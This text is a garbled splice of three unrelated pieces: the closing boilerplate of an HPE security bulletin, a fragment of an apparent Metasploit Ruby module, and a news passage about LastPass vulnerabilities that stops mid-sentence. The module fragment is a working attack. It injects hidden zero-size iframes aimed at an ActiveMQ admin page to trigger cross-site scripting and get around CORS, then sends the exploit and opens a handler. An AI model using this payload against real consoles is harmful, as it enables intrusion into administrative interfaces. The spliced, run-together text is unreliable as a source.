**Note:** A valid HPE Passport account is needed to download the patches.Please contact HPE Technical Support for assistance.

HISTORYVersion:1 (rev.1) - 1 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to beinstalled on systems running Hewlett Packard Enterprise (HPE) softwareproducts should be applied in accordance with the customer's patch managementpolicy.

Support: For issues about implementing the recommendations of this SecurityBulletin, contact normal HPE Services support channel. For other issues aboutthe content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com. [email concealed]

Hewlett Packard Enterprise shall not be liable for technical or editorialerrors or omissions contained herein. The information provided is provided"as is" without warranty of any kind. To the extent permitted by law, neitherHP or its affiliates, subcontractors or suppliers will be liable forincidental,special or consequential damages including downtime cost; lostprofits; damages relating to the procurement of substitute products orservices; or damages for loss of data, or software restoration. Theinformation in this document is subject to change without notice. HewlettPackard Enterprise and the names of Hewlett Packard Enterprise productsreferenced herein are trademarks of Hewlett Packard Enterprise in the UnitedStates and other countries. Other product and company names mentioned hereinmay be trademarks of their respective owners.

iframe_injection = ""# done so that we can ensure that we hit our payload, since iframes load very fast, we need a few(1..20).step(1) do |n|iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"end

# we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request# and the response is recieved in the page (even though we cant access it due to SOP) which then fires the XSShtml_content = %Q|<html><body><iframe src="#target" width="0" height="0"></iframe>#iframe_injection</body></html>|print_status("Sending exploit...")send_response_html(cli, html_content)handler(cli)endend

LastPass wrote about the vulnerability on Wednesday and said that a fix is already out for Firefox users.

Google security research Tavis Ormandy first discovered the issue. When examining the password manager, he tweeted on Tuesday, "Are people really using this lastpass thing? I took a quick look and can see a bunch of obvious critical problems. I'll send a report asap."

Any vulnerability with LastPass could pose a big risk for users. The popular software is supposed to securely store and autofill all the passwords users have for their different sites.

Ormandy isn't the only security researcher to find flaws with the password manager. On Wednesday, Mathias Karlsson at Detectify Labs said that he had also managed to hack LastPass -- in this case, to steal user passwords.

He did so by exploiting a bug in the password manager's Chrome browser extension, KarlssonInfoWorld Security